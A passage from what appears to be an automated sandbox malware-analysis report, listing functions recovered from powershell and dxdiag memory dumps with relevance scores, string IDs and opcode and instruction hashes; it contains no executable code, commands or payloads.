                        • Opcode ID: b3770da40ca6b45bac4bfbb74105895dd93567b0f2a738e18baf45b003c3496f
                        • Instruction ID: 3dedcde9fa6d08d8cf7681a7757e079d5937edab8127b853d7550631833c596b
                        • Opcode Fuzzy Hash: b3770da40ca6b45bac4bfbb74105895dd93567b0f2a738e18baf45b003c3496f
                        • Instruction Fuzzy Hash: E6C149B1B0020A8FEB249B6998157ABBBE6BFC5211F14C17AD949CF245DB31D842C7A1
                        Function 0736C9DF Relevance: 7.7, Strings: 6, Instructions: 163COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$d%q$d%q$d%q$tPq$$q
                        • API String ID: 0-2531934922
                        • Opcode ID: 3b6d467b04be5f3c9c00de49fd634312c2793aea255fa7d9b5ffdb736ee7829d
                        • Instruction ID: b200ffd8f28d4a90f83ab3090c0474f2a46ad077a22645ac6a7e0190f73dac7c
                        • Opcode Fuzzy Hash: 3b6d467b04be5f3c9c00de49fd634312c2793aea255fa7d9b5ffdb736ee7829d
                        • Instruction Fuzzy Hash: 295128F0A002069FEB24CF15C418BA9BBE5FF45250F19E4A6E8C99B699C731EC41CB71
                        Function 0736D928 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$tPq$$q$$q$$q
                        • API String ID: 0-838716513
                        • Opcode ID: b5eea4fce68e686c573094d5293a7a643e396fb33aebe33de512c29990feee9a
                        • Instruction ID: cc43a839ba107c3cdec8d698520c8a8983ae1315191061494d97e2fcfb2fd859
                        • Opcode Fuzzy Hash: b5eea4fce68e686c573094d5293a7a643e396fb33aebe33de512c29990feee9a
                        • Instruction Fuzzy Hash: 76619EF0B2420AEFFF248E15D54D7AA77A6AF45311F18C056E8499B69CC771D880CBA1
                        Function 0736CB26 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$d%q$d%q$d%q$tPq
                        • API String ID: 0-706544200
                        • Opcode ID: 247a3e329491c2b4f49a727af954b4a26a4d73662ac0756d595c18a053e16995
                        • Instruction ID: ed510f0eeb97aedde4fcc760e2518d74f64281fafdecb2bce8868d83e09a0303
                        • Opcode Fuzzy Hash: 247a3e329491c2b4f49a727af954b4a26a4d73662ac0756d595c18a053e16995
                        • Instruction Fuzzy Hash: 8131B1F0A002059FEB24DF55D449A69FBE2FB48650F18D199E889AB754C731EC42CBA1
                        Function 0736C290 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: (oq$(oq$(oq$(oq
                        • API String ID: 0-3853041632
                        • Opcode ID: 113562abaeca0865a0fa54ca9e1570c2556f2f2e54bebdc2a22edaf69049e186
                        • Instruction ID: e7f07d82e6b2769813bff6d2fe979fe73b49972e7e7daf19261b3db1f3050a2b
                        • Opcode Fuzzy Hash: 113562abaeca0865a0fa54ca9e1570c2556f2f2e54bebdc2a22edaf69049e186
                        • Instruction Fuzzy Hash: AAF149B1704309DFEB258F29C8187AA7BA6FF85311F14D46AE589CB295CB31E841C7B1
                        Function 073600F0 Relevance: 5.5, Strings: 4, Instructions: 458COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$tPq$tPq
                        • API String ID: 0-1392854178
                        • Opcode ID: 60e96fc4b05f81b755ecb47875a1b9d6c8784f253e062a7bfc4ebc696f1739fb
                        • Instruction ID: 0606baa8b1a559128684414c208abf159547a3f9960a7d9055bad307e4da6af8
                        • Opcode Fuzzy Hash: 60e96fc4b05f81b755ecb47875a1b9d6c8784f253e062a7bfc4ebc696f1739fb
                        • Instruction Fuzzy Hash: 4BE19FF1B043168FF7298B68941AB6ABBE6AFC5311F24C46AD90DCB259DA31CC41C761
                        Function 07361BB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $q$$q$$q$$q
                        • API String ID: 0-4102054182
                        • Opcode ID: 6560a477e8f12730bfeee5eaec31a377865594873e8daae87873ca54916e82a0
                        • Instruction ID: da4c8f05b66ae7e6293f8b2a5a162c657f7d1d960e9ba429fee45ac282f32f41
                        • Opcode Fuzzy Hash: 6560a477e8f12730bfeee5eaec31a377865594873e8daae87873ca54916e82a0
                        • Instruction Fuzzy Hash: 26216BF130030A9BF738563A981977BB7DAABC0611F24C43AE94DCB389DE72C8418361
                        Function 07368470 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: $q$$q$$q$$q
                        • API String ID: 0-4102054182
                        • Opcode ID: 8fa83c93c3b4657d73b5125589764d15427137de6ab7553fa4a46071e62aa106
                        • Instruction ID: aa75ff1180b36144f9db3b90cb703943160ba0612ec0be31e97ae0a168c26b0a
                        • Opcode Fuzzy Hash: 8fa83c93c3b4657d73b5125589764d15427137de6ab7553fa4a46071e62aa106
                        • Instruction Fuzzy Hash: 801172F1A00217CFEB318E59A5496F6BBB4EB8D360F19C06AE90C9720DEB71C545C751
                        Function 07361A38 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$$q$$q
                        • API String ID: 0-3199993180
                        • Opcode ID: 85df672f5a677e39b75a78c14fa51ee5b4aa7e8420aa91e1cb9257093b5284f3
                        • Instruction ID: fb3e78e6bb9edbecbfd8e35656e4d131705d6ea1daea63be66f4300b4e244f0f
                        • Opcode Fuzzy Hash: 85df672f5a677e39b75a78c14fa51ee5b4aa7e8420aa91e1cb9257093b5284f3
                        • Instruction Fuzzy Hash: 7001A2A171A3C65FE32B12683C251A66F725FC351031E85D7E981CF69BC9548C8AC3A7

                        Non-executed Functions

                        Function 02F022ED Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000019.00000002.2602971714.0000000002F00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_25_2_2f00000_dxdiag.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d5a0d8f399937456e7f73797f68b196e5d6d6aa4931cb9b98dfeee6a7d9738c
                        • Instruction ID: d510b669deafe56f881c61032cfbabee4d6b87cbc1c0e13339618037bc9cc784
                        • Opcode Fuzzy Hash: 2d5a0d8f399937456e7f73797f68b196e5d6d6aa4931cb9b98dfeee6a7d9738c
                        • Instruction Fuzzy Hash: 90117A3668F3E29ECB12CA7595E82A9BF91AE13B5030801CDCAC14F987C361D44AE760